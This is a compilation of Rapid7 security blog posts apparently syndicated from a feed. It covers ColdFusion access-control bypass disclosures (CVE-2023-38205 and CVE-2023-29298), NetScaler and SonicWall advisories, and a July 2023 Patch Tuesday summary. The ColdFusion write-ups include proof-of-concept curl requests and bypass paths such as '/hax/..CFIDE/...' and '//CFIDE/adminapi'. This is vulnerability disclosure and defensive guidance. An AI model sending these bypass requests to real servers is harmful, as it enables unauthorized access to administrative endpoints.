The method Utils.canonicalizeURI attempts to remove sequences of characters such as duplicate forward slashes, double dot notation and redundant dot path segments in a URLs path, as shown below.

  public static String canonicalizeURI(String uri) {
    if (uri == null || uri.length() == 0)
      return uri;
    uri = uri.replace('\\', '/');
    uri = trimDuplicateSlashes(uri);
    uri = collapseDotDots(uri); // <----
    uri = trimTrailingDotsSpacesNull(uri);
    if (uri.charAt(0) == '.')
      uri = uri.substring(1);
    uri = substitute(uri, "/./", "/");
    if (uri.endsWith("/."))
      uri = uri.substring(0, uri.length() - 2);
    if (uri.length() == 0)
      uri = "/";
    return uri;
  }

Of note is the method `Utils.collapseDotDots`, which will remove all path segments that contain a double dot along with the preceding path segment. For example, if a URL path has the string `“/hello/../world/”` then the method `Utils.collapseDotDots` would correctly transform this string into `“/world/”` by deleting the character sequence `“/hello/..”` via a call to `StringBuffer.delete` as shown below.

  public static String collapseDotDots(String str) {
    if (str.indexOf("/..") == -1)
      return str;
    StringBuffer sb = new StringBuffer(str);
    int i;
    while ((i = str.indexOf("/..")) != -1) {
      int segmentStart = str.lastIndexOf('/', i - 1);
      sb.delete(segmentStart, i + 3); // <----
      str = sb.toString();
    }
    if (str.length() == 0)
      str = "/";
    return str;
  }  

While the above is correct, it exposes an issue in how ColdFusion handles ColdFusion Modules (CFM) and ColdFusion Component (CFC) endpoints when resolving a path to the endpoint. If an attacker accesses a URL path of “/hax/..CFIDE/wizards/common/utils.cfc” the access control can be bypassed and the expected endpoint can still be reached, even though it is not a valid URL path (Note, there is no expected forward slash after the double dot and before CFIDE).

Upon processing this path, the method Utils.collapseDotDots will transform the path to “cfide/wizards/common/utils.cfc” by removing the double dot path segment and the preceding segment “/hax/..”. The path “cfide/wizards/common/utils.cfc” will not be matched against any of the restricted paths in RESTRICTED_INTERNAL_PATHS during IPFilterUtils.checkAdminAccess because it no longer begins with a leading forward slash. This bypasses the access control. However, the underlying Servlet will still process the path “/hax/..CFIDE/wizards/common/utils.cfc”, allowing the expected CFC endpoint to be called. The same is true for CFM endpoints.

Exploitation

The following was tested on Adobe ColdFusion 2021 Update 8 (2021.0.08.330144) running on Windows Server 2022 and configured with the Production and Secure profiles.

We can demonstrate the patch bypass by using the cURL command. For example when attempting to perform a remote method call wizardHash on the /CFIDE/wizards/common/utils.cfc endpoint, the following cURL command can be used — note the use of double dot notation as highlighted below:

Note: The ampersand (&) has been escaped with a caret (^) as this example is run from Windows, on Linux you must escape the ampersand with a forward slash (\).

c:\> curl -ivk --path-as-is http://172.25.25.0:8500/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash^&inPassword=foo

CVE-2023-38205: Adobe ColdFusion Access Control Bypass [FIXED]

We can see that both the access control and the patch for CVE-2023-29298 have been bypassed and the request completed successfully.

Remediation

Adobe released a fix for this vulnerability on July 19, 2023. The following versions remediate the issue, per Adobe’s advisory:

  • Adobe ColdFusion 2023 Update 3
  • Adobe ColdFusion 2021 Update 9
  • Adobe ColdFusion 2018 Update 19

Since Rapid7 has observed exploitation in the wild, we strongly recommend ColdFusion customers update to the latest versions as soon as possible, without waiting for a typical patch cycle to occur.

Timeline

  • April 11 through July 10, 2023: Rapid7 discloses CVE-2023-29298 to Adobe, Rapid7 and Adobe coordinate disclosure
  • July 11, 2023: Rapid7 and Adobe disclose CVE-2023-29298 publicly
  • July 13 – 15, 2023: Rapid7 detects exploitation of Adobe ColdFusion in the wild, determines attackers are leveraging an exploit chain that ends in remote code execution
  • July 17, 2023: Rapid7 warns customers of ColdFusion exploitation in the wild. Rapid7 discovers the patch for CVE-2023-29298 can be bypassed and informs Adobe. Adobe notifies Rapid7 of their intent to fix the patch bypass.
  • July 18, 2023: Further coordinationJuly 19, 2023: This disclosure.

Critical Zero-Day Vulnerability in Citrix NetScaler ADC and NetScaler Gateway

Post Syndicated from Caitlin Condon original https://blog.rapid7.com/2023/07/18/etr-critical-zero-day-vulnerability-in-citrix-netscaler-adc-and-netscaler-gateway/

Critical Zero-Day Vulnerability in Citrix NetScaler ADC and NetScaler Gateway

On Tuesday, July 18, Citrix published a security bulletin warning users of three new vulnerabilities affecting NetScaler ADC and NetScaler Gateway. Of the three vulnerabilities, CVE-2023-3519 is the most severe—successful exploitation allows unauthenticated attackers to execute code remotely on vulnerable target systems that are configured as a Gateway.  

  • CVE-2023-3466: Reflected XSS vulnerability—successful exploitation requires the victim to access an attacker-controlled link in the browser while being on a network with connectivity to the NetScaler IP (NSIP)
  • CVE-2023-3467: Allows for privilege escalation to root administrator (nsroot)
  • CVE-2023-3519: Unauthenticated remote code execution—NOTE that the appliance must be configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) OR AAA  virtual server

CVE-2023-3519 is known to be exploited in the wild. This product line is a popular target for attackers of all skill levels, and we expect that exploitation will increase quickly. Rapid7 strongly recommends updating to a fixed version on an emergency basis, without waiting for a typical patch cycle to occur. See the Citrix advisory for more information.

Affected Products

According to Citrix, the following supported versions of NetScaler ADC and NetScaler Gateway are affected by the vulnerabilities:

  • NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.13
  • NetScaler ADC and NetScaler Gateway 13.0 before 13.0-91.13
  • NetScaler ADC 13.1-FIPS before 13.1-37.159
  • NetScaler ADC 12.1-FIPS before 12.1-65.36
  • NetScaler ADC 12.1-NDcPP before 12.65.36

The advisory notes that NetScaler ADC and NetScaler Gateway version 12.1 is End Of Life (EOL) and is vulnerable. Citrix recommends that customers who are using an EOL version upgrade their appliances to one of the supported fixed versions below.

All three CVEs are remediated in the following fixed product versions:

  • NetScaler ADC and NetScaler Gateway 13.1-49.13  and later releases
  • NetScaler ADC and NetScaler Gateway 13.0-91.13  and later releases of 13.0
  • NetScaler ADC 13.1-FIPS 13.1-37.159 and later releases of 13.1-FIPS
  • NetScaler ADC 12.1-FIPS 12.1-65.36 and later releases of 12.1-FIPS
  • NetScaler ADC 12.1-NDcPP 12.1-65.36 and later releases of 12.1-NDcPP

Mitigation guidance

Patches are available for vulnerable versions of NetScaler ADC and NetScaler Gateway and should be applied on an emergency basis. For more information, see Citrix’s advisory.

Rapid7 customers

Our engineering team is investigating vulnerability check implementation options for InsightVM and Nexpose customers. We will update this blog with further information by 2 PM ET.

SonicWall Recommends Urgent Patching for GMS and Analytics CVEs

Post Syndicated from Caitlin Condon original https://blog.rapid7.com/2023/07/13/etr-sonicwall-recommends-urgent-patching-for-gms-and-analytics-cves/

SonicWall Recommends Urgent Patching for GMS and Analytics CVEs

On Wednesday, July 12, 2023, security firm SonicWall published an urgent security advisory warning customers of 15 new vulnerabilities affecting on-premise instances of their Global Management System (GMS) and Analytics products. Four of the vulnerabilities carry critical severity ratings:

  • CVE-2023-34124: Web service authentication bypass
  • CVE-2023-34133: Multiple unauthenticated SQL injection issues and security filter bypass
  • CVE-2023-34134: Password hash read via web service
  • CVE-2023-34137: CAS authentication bypass

The rest of the vulnerabilities include a predictable password reset key issue and a hard-coded Tomcat credentials issue, in addition to command injection, file write, file upload, password hash read, and other issues. SonicWall took the unusual (but not unprecedented) step of issuing an urgent security notice for the new CVEs.

Per the company’s advisory, the various vulnerabilities could allow an attacker to view data that they would not normally be able to retrieve, including data belonging to other users or other data that the application itself is able to access. Attackers may be able to modify or delete this data, causing persistent changes to the application’s content or behavior. At least on the surface, the potential for data exposure and theft as a result of these flaws sounds reminiscent of the recent MOVEit Transfer vulnerabilities — we expect these CVEs to be extremely attractive to adversaries, including those looking to extort victims after executing smash-and-grab attacks.

While the vulnerabilities are not known to be exploited in the wild as of July 13, 2023, SonicWall vulnerabilities, including Rapid7-discovered vulnerabilities, have been popular targets for adversaries in the past (including ransomware groups). The urgent nature of SonicWall’s warning reflects that history and should be heeded.

Mitigation guidance

The affected products are:

  • SonicWall GMS 9.3.2-SP1 and before
  • SonicWall Analytics 2.5.0.4-R7 and before

The vulnerabilities are fixed in SonicWall GMS 9.3.3 and SonicWall Analytics 2.5.2. We urge on-prem customers to update immediately, without waiting for a regular patch cycle to occur. See SonicWall’s advisory for full details.

Rapid7 customers

Our engineering team expects to ship remote vulnerability checks for the vulnerabilities affecting SonicWall GMS in today’s (July 13) content release. We are investigating the feasibility of adding checks for SonicWall Analytics.

Patch Tuesday – July 2023

Post Syndicated from Adam Barnett original https://blog.rapid7.com/2023/07/11/patch-tuesday-july-2023/

Patch Tuesday - July 2023

Microsoft is addressing 130 vulnerabilities this July Patch Tuesday, including five zero-day vulnerabilities, and eight further critical remote code execution (RCE) vulnerabilities. Overall, it’s safe to say that this is a busier Patch Tuesday than the past couple of months. Note that the total count of vulnerabilities reported no longer includes any Edge-on-Chromium fixes.

Office zero-day maldoc vuln: no patch, no problem

Surprisingly, there is no patch yet for one of the five zero-day vulnerabilities. Microsoft is actively investigating publicly-disclosed Office RCE CVE-2023-36884, and promises to update the advisory as soon as further guidance is available. Exploitation requires the victim to open a specially crafted malicious document, which would typically be delivered via email.

A Microsoft Security Research Centre (MSRC) blog post links exploitation of this vulnerability with Storm-0978, Microsoft’s designation for a cybercriminal group based out of Russia also tracked across the wider industry under the name RomCom. MSRC suggests that RomCom / Storm-0978 is operating in support of Russian intelligence operations. The same threat actor has also been associated with ransomware attacks targeting a wide array of victims.

Defenders who are understandably unsettled by the lack of immediate patches for CVE-2023-36884 should consult the multiple mitigation options on the advisory. Microsoft claims that assets with Defender for Office 365 are already protected. Further options include an existing optional Defender for Endpoint Attack Surface Reduction (ASR) rule to prevent Office from creating child processes, and a registry modification to disable the vulnerable cross-protocol file navigation. The registry option might be the most straightforward option for organizations without a mature Defender program, but Microsoft does warn that certain use cases relying on the functionality would be impacted if this mitigation is deployed.

There are broad similarities to last year’s Follina vulnerability, which was discussed publicly for over two weeks starting late May 2023 before Microsoft patched it on June 14th as part of Patch Tuesday. While it’s possible that a patch for CVE-2023-36884 will be issued as part of next month’s Patch Tuesday, Microsoft Office is deployed just about everywhere, and this threat actor is making waves; admins should be ready for an out-of-cycle security update for CVE-2023-26884.

The menu of mitigation options here should offer something for every Microsoft shop, but it will come as something of a relief that Microsoft is offering patches for the four other zero-day vulnerabilities mentioned in this month’s Security Update Guide.

MSHTML, Windows Error Reporting: zero-day elevation of privilege vulns

CVE-2023-32046 describes a vulnerability in the MSHTML browser rendering engine which would allow an attacker to act with the same rights as the exploited user account. Successful exploitation requires the victim to open a specially-crafted malicious file, typically delivered either via email or a web page. Assets where Internet Explorer 11 has been fully disabled are still vulnerable until patched; the MSHTML engine remains installed within Windows regardless of the status of IE11, since it is used in other contexts (e.g. Outlook).

A separate vulnerability in the Windows Error Reporting Service allows elevation to the Administrator role via abuse of Windows performance tracing. To exploit CVE-2023-36874, an attacker must already have existing local access to an asset, so this vulnerability will most likely make up part of a longer exploit chain.

SmartScreen & Outlook: zero-day security feature bypass vulns

Rounding out this month’s zero-day vulnerabilities are two security feature bypass flaws. CVE-2023-32049 allows an attacker to formulate a URL which will bypass the Windows SmartScreen “Do you want to open this file?” dialog. Previous SmartScreen bypasses have been exploited extensively, not least for no-notice delivery of ransomware.

Broadly similar is CVE-2023-35311, which describes a bypass of the Microsoft Outlook Security Notice dialog via a specially-crafted URL.

Windows RRAS: critical RCEs

Eight further critical RCE vulnerabilities are also patched, including three related vulnerabilities in the Windows Routing and Remote Access Service (RRAS) with CVSS v3 base score of 9.8 (CVE-2023-35365, CVE-2023-35366, and CVE-2023-35367). In each case, an attacker can send specially-crafted packets to vulnerable assets to achieve RCE. Happily, RRAS is not installed or configured by default, but admins with RRAS-enabled Windows Server installations will undoubtedly want to prioritize remediation.

SharePoint: critical RCEs

Anyone responsible for on-prem SharePoint should patch to avoid a variety of potential impacts from exploitation of CVE-2023-33157 and CVE-2023-33160, including information disclosure and editing, as well as reduced availability of the targeted environment. While both of these vulnerabilities require that an attacker already be authenticated as a user with at least Site Member privileges, this isn’t necessarily much of a defense, since this is the lowest standard permission group with the least privileges other than the read-only Site Visitor role, and will typically be widely granted. Microsoft assesses exploitation as more likely for both of these.

Windows core components: critical RCEs

The remainder of this month’s critical RCE patches target flaws in the Windows Layer-2 Bridge Network Driver (CVE-2023-35315), and usual suspects Windows Message Queuing (CVE-2023-32057) and Windows PGM (CVE-2023-35297).

Windows Remote Desktop: security feature bypass

CVE-2023-35352 will be of interest to anyone running an RDP server. Although the advisory is short on detail, an attacker could bypass certificate or private key authentication when establishing a remote desktop protocol session. Although the CVSS v3 base score of 7.5 falls short of the critical band, this is only because Microsoft has scored this vulnerability as having no impact on either confidentiality or availability, probably because the scoring is against the RDP service itself rather than whatever may be accessed downstream; this seems like a case where CVSS cannot fully capture the potential risk, and Microsoft’s Security Update Severity Rating System does rank this vulnerability as critical.

Summary Charts

Patch Tuesday - July 2023
Windows RPC is back!
Patch Tuesday - July 2023
Many of those Remote Code Execution vulnerabilities require user interaction.
Patch Tuesday - July 2023
An unremarkable distribution of CVSSv3 base scores.

Patch Tuesday - July 2023
This heatmap shows distribution of vulnerabilities, rather than risk.

Summary Tables

Apps vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-32047 Paint 3D Remote Code Execution Vulnerability No No 7.8
CVE-2023-35374 Paint 3D Remote Code Execution Vulnerability No No 7.8

Azure vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-36868 Azure Service Fabric on Windows Information Disclosure Vulnerability No No 6.5

Developer Tools vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-35333 MediaWiki PandocUpload Extension Remote Code Execution Vulnerability No No 8.8
CVE-2023-33170 ASP.NET and Visual Studio Security Feature Bypass Vulnerability No No 8.1
CVE-2023-33127 .NET and Visual Studio Elevation of Privilege Vulnerability No No 8.1
CVE-2023-36867 Visual Studio Code GitHub Pull Requests and Issues Extension Remote Code Execution Vulnerability No No 7.8
CVE-2023-35373 Mono Authenticode Validation Spoofing Vulnerability No No 5.3

ESU vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-32050 Windows Installer Elevation of Privilege Vulnerability No No 7

Microsoft Dynamics vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-33171 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability No No 8.2
CVE-2023-35335 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability No No 8.2
CVE-2023-32052 Microsoft Power Apps (online) Spoofing Vulnerability No No 5.4

Microsoft Office vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-33150 Microsoft Office Security Feature Bypass Vulnerability No No 9.6
CVE-2023-33159 Microsoft SharePoint Server Spoofing Vulnerability No No 8.8
CVE-2023-33160 Microsoft SharePoint Server Remote Code Execution Vulnerability No No 8.8
CVE-2023-33134 Microsoft SharePoint Server Remote Code Execution Vulnerability No No 8.8
CVE-2023-33157 Microsoft SharePoint Remote Code Execution Vulnerability No No 8.8
CVE-2023-35311 Microsoft Outlook Security Feature Bypass Vulnerability Yes No 8.8
CVE-2023-33149 Microsoft Office Graphics Remote Code Execution Vulnerability No No 7.8
CVE-2023-33148 Microsoft Office Elevation of Privilege Vulnerability No No 7.8
CVE-2023-33158 Microsoft Excel Remote Code Execution Vulnerability No No 7.8
CVE-2023-33161 Microsoft Excel Remote Code Execution Vulnerability No No 7.8
CVE-2023-33152 Microsoft ActiveX Remote Code Execution Vulnerability No No 7
CVE-2023-33153 Microsoft Outlook Remote Code Execution Vulnerability No No 6.8
CVE-2023-33151 Microsoft Outlook Spoofing Vulnerability No No 6.5
CVE-2023-33162 Microsoft Excel Information Disclosure Vulnerability No No 5.5
CVE-2023-33165 Microsoft SharePoint Server Security Feature Bypass Vulnerability No No 4.3

Microsoft Office Windows ESU vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability Yes Yes 8.3

System Center vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-33156 Microsoft Defender Elevation of Privilege Vulnerability No No 6.3

Windows vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-32049 Windows SmartScreen Security Feature Bypass Vulnerability Yes No 8.8
CVE-2023-35315 Windows Layer-2 Bridge Network Driver Remote Code Execution Vulnerability No No 8.8
CVE-2023-35364 Windows Kernel Elevation of Privilege Vulnerability No No 8.8
CVE-2023-35302 Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability No No 8.8
CVE-2023-29347 Windows Admin Center Spoofing Vulnerability No No 8.7
CVE-2023-21756 Windows Win32k Elevation of Privilege Vulnerability No No 7.8
CVE-2023-35317 Windows Server Update Service (WSUS) Elevation of Privilege Vulnerability No No 7.8
CVE-2023-32056 Windows Server Update Service (WSUS) Elevation of Privilege Vulnerability No No 7.8
CVE-2023-35313 Windows Online Certificate Status Protocol (OCSP) SnapIn Remote Code Execution Vulnerability No No 7.8
CVE-2023-35323 Windows OLE Remote Code Execution Vulnerability No No 7.8
CVE-2023-35356 Windows Kernel Elevation of Privilege Vulnerability No No 7.8
CVE-2023-35357 Windows Kernel Elevation of Privilege Vulnerability No No 7.8
CVE-2023-35358 Windows Kernel Elevation of Privilege Vulnerability No No 7.8
CVE-2023-35363 Windows Kernel Elevation of Privilege Vulnerability No No 7.8
CVE-2023-35304 Windows Kernel Elevation of Privilege Vulnerability No No 7.8
CVE-2023-35305 Windows Kernel Elevation of Privilege Vulnerability No No 7.8
CVE-2023-35343 Windows Geolocation Service Remote Code Execution Vulnerability No No 7.8
CVE-2023-33155 Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2023-35362 Windows Clip Service Elevation of Privilege Vulnerability No No 7.8
CVE-2023-35337 Win32k Elevation of Privilege Vulnerability No No 7.8
CVE-2023-32051 Raw Image Extension Remote Code Execution Vulnerability No No 7.8
CVE-2023-35320 Connected User Experiences and Telemetry Elevation of Privilege Vulnerability No No 7.8
CVE-2023-35353 Connected User Experiences and Telemetry Elevation of Privilege Vulnerability No No 7.8
CVE-2023-35352 Windows Remote Desktop Security Feature Bypass Vulnerability No No 7.5
CVE-2023-35325 Windows Print Spooler Information Disclosure Vulnerability No No 7.5
CVE-2023-35339 Windows CryptoAPI Denial of Service Vulnerability No No 7.5
CVE-2023-32084 HTTP.sys Denial of Service Vulnerability No No 7.5
CVE-2023-35298 HTTP.sys Denial of Service Vulnerability No No 7.5
CVE-2023-35348 Active Directory Federation Service Security Feature Bypass Vulnerability No No 7.5
CVE-2023-35347 Microsoft Install Service Elevation of Privilege Vulnerability No No 7.1
CVE-2023-35360 Windows Kernel Elevation of Privilege Vulnerability No No 7
CVE-2023-35361 Windows Kernel Elevation of Privilege Vulnerability No No 7
CVE-2023-35336 Windows MSHTML Platform Security Feature Bypass Vulnerability No No 6.5
CVE-2023-35308 Windows MSHTML Platform Security Feature Bypass Vulnerability No No 6.5
CVE-2023-35331 Windows Local Security Authority (LSA) Denial of Service Vulnerability No No 6.5
CVE-2023-32037 Windows Layer-2 Bridge Network Driver Information Disclosure Vulnerability No No 6.5
CVE-2023-35329 Windows Authentication Denial of Service Vulnerability No No 6.5
CVE-2023-35296 Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability No No 6.5
CVE-2023-32083 Microsoft Failover Cluster Information Disclosure Vulnerability No No 6.5
CVE-2023-36871 Azure Active Directory Security Feature Bypass Vulnerability No No 6.5
CVE-2023-32041 Windows Update Orchestrator Service Information Disclosure Vulnerability No No 5.5
CVE-2023-35326 Windows CDP User Components Information Disclosure Vulnerability No No 5.5
CVE-2023-36872 VP9 Video Extensions Information Disclosure Vulnerability No No 5.5
CVE-2023-32039 Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability No No 5.5
CVE-2023-32040 Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability No No 5.5
CVE-2023-35324 Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability No No 5.5
CVE-2023-32085 Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability No No 5.5
CVE-2023-35306 Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability No No 5.5

Windows ESU vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-35365 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability No No 9.8
CVE-2023-35366 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability No No 9.8
CVE-2023-35367 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability No No 9.8
CVE-2023-32057 Microsoft Message Queuing Remote Code Execution Vulnerability No No 9.8
CVE-2023-35322 Windows Deployment Services Remote Code Execution Vulnerability No No 8.8
CVE-2023-35303 USB Audio Class System Driver Remote Code Execution Vulnerability No No 8.8
CVE-2023-35300 Remote Procedure Call Runtime Remote Code Execution Vulnerability No No 8.8
CVE-2023-32038 Microsoft ODBC Driver Remote Code Execution Vulnerability No No 8.8
CVE-2023-35328 Windows Transaction Manager Elevation of Privilege Vulnerability No No 7.8
CVE-2023-33154 Windows Partition Management Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2023-32046 Windows MSHTML Platform Elevation of Privilege Vulnerability Yes No 7.8
CVE-2023-32053 Windows Installer Elevation of Privilege Vulnerability No No 7.8
CVE-2023-35342 Windows Image Acquisition Elevation of Privilege Vulnerability No No 7.8
CVE-2023-36874 Windows Error Reporting Service Elevation of Privilege Vulnerability Yes No 7.8
CVE-2023-35299 Windows Common Log File System Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2023-35340 Windows CNG Key Isolation Service Elevation of Privilege Vulnerability No No 7.8
CVE-2023-35312 Microsoft VOLSNAP.SYS Elevation of Privilege Vulnerability No No 7.8
CVE-2023-35297 Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability No No 7.5
CVE-2023-35338 Windows Peer Name Resolution Protocol Denial of Service Vulnerability No No 7.5
CVE-2023-33163 Windows Network Load Balancing Remote Code Execution Vulnerability No No 7.5
CVE-2023-35330 Windows Extended Negotiation Denial of Service Vulnerability No No 7.5
CVE-2023-35309 Microsoft Message Queuing Remote Code Execution Vulnerability No No 7.5
CVE-2023-32044 Microsoft Message Queuing Denial of Service Vulnerability No No 7.5
CVE-2023-32045 Microsoft Message Queuing Denial of Service Vulnerability No No 7.5
CVE-2023-21526 Windows Netlogon Information Disclosure Vulnerability No No 7.4
CVE-2023-32054 Volume Shadow Copy Elevation of Privilege Vulnerability No No 7.3
CVE-2023-35350 Windows Active Directory Certificate Services (AD CS) Remote Code Execution Vulnerability No No 7.2
CVE-2023-32043 Windows Remote Desktop Security Feature Bypass Vulnerability No No 6.8
CVE-2023-35332 Windows Remote Desktop Protocol Security Feature Bypass No No 6.8
CVE-2023-32055 Active Template Library Elevation of Privilege Vulnerability No No 6.7
CVE-2023-35344 Windows DNS Server Remote Code Execution Vulnerability No No 6.6
CVE-2023-35345 Windows DNS Server Remote Code Execution Vulnerability No No 6.6
CVE-2023-35346 Windows DNS Server Remote Code Execution Vulnerability No No 6.6
CVE-2023-35310 Windows DNS Server Remote Code Execution Vulnerability No No 6.6
CVE-2023-35351 Windows Active Directory Certificate Services (AD CS) Remote Code Execution Vulnerability No No 6.6
CVE-2023-32033 Microsoft Failover Cluster Remote Code Execution Vulnerability No No 6.6
CVE-2023-35321 Windows Deployment Services Denial of Service Vulnerability No No 6.5
CVE-2023-35316 Remote Procedure Call Runtime Information Disclosure Vulnerability No No 6.5
CVE-2023-33166 Remote Procedure Call Runtime Denial of Service Vulnerability No No 6.5
CVE-2023-33167 Remote Procedure Call Runtime Denial of Service Vulnerability No No 6.5
CVE-2023-33168 Remote Procedure Call Runtime Denial of Service Vulnerability No No 6.5
CVE-2023-33169 Remote Procedure Call Runtime Denial of Service Vulnerability No No 6.5
CVE-2023-33172 Remote Procedure Call Runtime Denial of Service Vulnerability No No 6.5
CVE-2023-33173 Remote Procedure Call Runtime Denial of Service Vulnerability No No 6.5
CVE-2023-32034 Remote Procedure Call Runtime Denial of Service Vulnerability No No 6.5
CVE-2023-32035 Remote Procedure Call Runtime Denial of Service Vulnerability No No 6.5
CVE-2023-35314 Remote Procedure Call Runtime Denial of Service Vulnerability No No 6.5
CVE-2023-35318 Remote Procedure Call Runtime Denial of Service Vulnerability No No 6.5
CVE-2023-35319 Remote Procedure Call Runtime Denial of Service Vulnerability No No 6.5
CVE-2023-33164 Remote Procedure Call Runtime Denial of Service Vulnerability No No 6.5
CVE-2023-32042 OLE Automation Information Disclosure Vulnerability No No 6.5
CVE-2023-35341 Microsoft DirectMusic Information Disclosure Vulnerability No No 6.2
CVE-2023-33174 Windows Cryptographic Information Disclosure Vulnerability No No 5.5

CVE-2023-29298: Adobe ColdFusion Access Control Bypass

Post Syndicated from Stephen Fewer original https://blog.rapid7.com/2023/07/11/cve-2023-29298-adobe-coldfusion-access-control-bypass/

CVE-2023-29298: Adobe ColdFusion Access Control Bypass

Rapid7 discovered an access control bypass vulnerability affecting Adobe ColdFusion, in a product feature designed to restrict external access to the ColdFusion Administrator. Rapid7 reported this vulnerability to Adobe on April 11, 2023 and we are now disclosing it in accordance with our vulnerability disclosure policy.

The access control feature establishes an allow list of external IP addresses that are permitted to access the ColdFusion Administrator endpoints on a ColdFusion web server. When a request originates from an external IP address that is not present in the allow list, access to the requested resource is blocked. This access control forms part of the recommended configuration for production environments, as described during installation of the product:

“Production Profile + Secure Profile: Use this profile for a highly-secure production deployment that will allow a more fine-grained secure environment. For details, see the secure profile guide http://www.adobe.com/go/cf_secureprofile.”

Alternatively, an installation that is not configured with the Secure Profile may manually configure the access control post installation.
The vulnerability allows an attacker to access the administration endpoints by inserting an unexpected additional forward slash character in the requested URL.

Product description

Adobe ColdFusion is a commercial application server for web application development. ColdFusion supports a proprietary markup language for building web applications and integrating into many external components, such as databases and third party libraries.
This issue affects the following versions of Adobe ColdFusion:

  • Adobe ColdFusion 2023.
  • Adobe ColdFusion 2021 Update 6 and below.
  • Adobe ColdFusion 2018 Update 16 and below.

Impact

This vulnerability undermines the security guarantees offered by the ColdFusion Secure Profile. Using the access control bypass as described above, an attacker is able to access every CFM and CFC endpoint within the ColdFusion Administrator path /CFIDE/, of which there are 437 CFM files and 96 CFC files in a ColdFusion 2021 Update 6 install. Note that access to these resources does not imply the attacker is authorized to use these resources, many of which will check for an authorized session before performing their operation. However the impact of being able to access these resources is as follows:

  • The attacker may log in to the ColdFusion Administrator if they have known credentials.
  • The attacker may bruteforce credentials.
  • The attacker may leak sensitive information.
    The attacker has increased the attack surface considerably and should a vulnerability be present in one of the many exposed CFM and CFC files, the attacker is able to target the vulnerable endpoint.

Credit

This vulnerability was discovered by Stephen Fewer, Principal Security Researcher at Rapid7 and is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Vendor statement

CVE-2023-29298 has been addressed in Adobe’s APSB23-40 Security Bulletin – CF2018 Update 17, CF2021 Update 7, and CF2023 GA build. Adobe greatly appreciates collaboration with the broader security community and our ongoing work with Rapid7. For more information, please see: https://helpx.adobe.com/security/products/coldfusion/apsb23-40.html

Analysis

The access control restricts access for external request to resources that are found within the following URL paths:

/CFIDE/restplay
/CFIDE/administrator
/CFIDE/adminapi
/CFIDE/main
/CFIDE/componentutils
/CFIDE/wizards
/CFIDE/servermanager```
Several Java servlets enforce the access control on their exposed resources:
- The `coldfusion.CfmServlet` which handles all requests to ColdFusion Module (CFM) endpoints.
- The `coldfusion.xml.rpc.CFCServlet` which handles requests to ColdFusion Markup Language (CFML) and ColdFusion Component (CFC) endpoints.
- The `coldfusion.rds.RdsGlobals` which handles requests for the Remote Development Service (RDS) feature.
The access control feature is implemented in the `coldfusion.filter.IPFilterUtils` class, and the method `checkAdminAccess` implements the logic for the access control, as shown below:
```public class IPFilterUtils {
private static final String[] PATHS = new String[] { "/restplay", "/cfide/restplay", "/cfide/administrator", "/cfide/adminapi", "/cfide/main", "/cfide/componentutils", "/cfide/wizards", "/cfide/servermanager" };
public static void checkAdminAccess(HttpServletRequest req) {
String uri = req.getRequestURI();
String uriToMatch = uri.substring(req.getContextPath().length()).toLowerCase();
for (String path : PATHS) {
if (uriToMatch.startsWith(path)) {
String ip = req.getRemoteAddr();
if (!isAllowedIP(ip))
throw new AdminAccessdeniedException(ServiceFactory.getSecurityService().getAllowedAdminIPList(), ip);
break;
}
}
}```
We can observe from the highlighted statement above that an HTTP request’s URL path is compared to a list of sensitive paths, and if found to begin with any of these sensitive paths, a further check is performed to see if the request’s external IP address is present in the allow list. If the request to a sensitive path is not from an allowed external IP address, an exception is raised which results in the request being denied.
As the attacker-controlled URL path is tested with a call to `java.lang.String.startsWith`, this access check can be bypassed by inserting an additional character at the start of the URL path, which will cause the `startsWith` check to fail but will still allow the underlying servlet to be able to resolve the requested resource. The character in question is an additional forward slash. For example, when requesting a resource that starts with the sensitive `/CFIDE/adminapi` path, the attacker can request this resource from the path `//CFIDE/adminapi`, which will bypass the access control while still being a valid path to the requested resource.
## Exploitation
The following was tested on Adobe ColdFusion 2021 Update 6 (2021.0.06.330132) running on Windows Server 2022 and configured with the Production and Secure profiles enabled and access to the ColdFusion Administrator limited to the localhost address 127.0.0.1.
We can demonstrate the vulnerability using the cURL command. For example when attempting to perform a remote method call wizardHash on the `/CFIDE/wizards/common/utils.cfc` endpoint, the following cURL command can be used:
*Note: The ampersand (&) has been escaped with a caret (^) as this example is run from Windows. On Linux you must escape the ampersand with a forward slash (\).*

c:> curl -v -k http://172.23.10.174:8500/CFIDE/wizards/common/utils.cfc?method=wizardHash^&inPassword=foo

We can see in the screenshot below how this request fails due to the access control being in place:

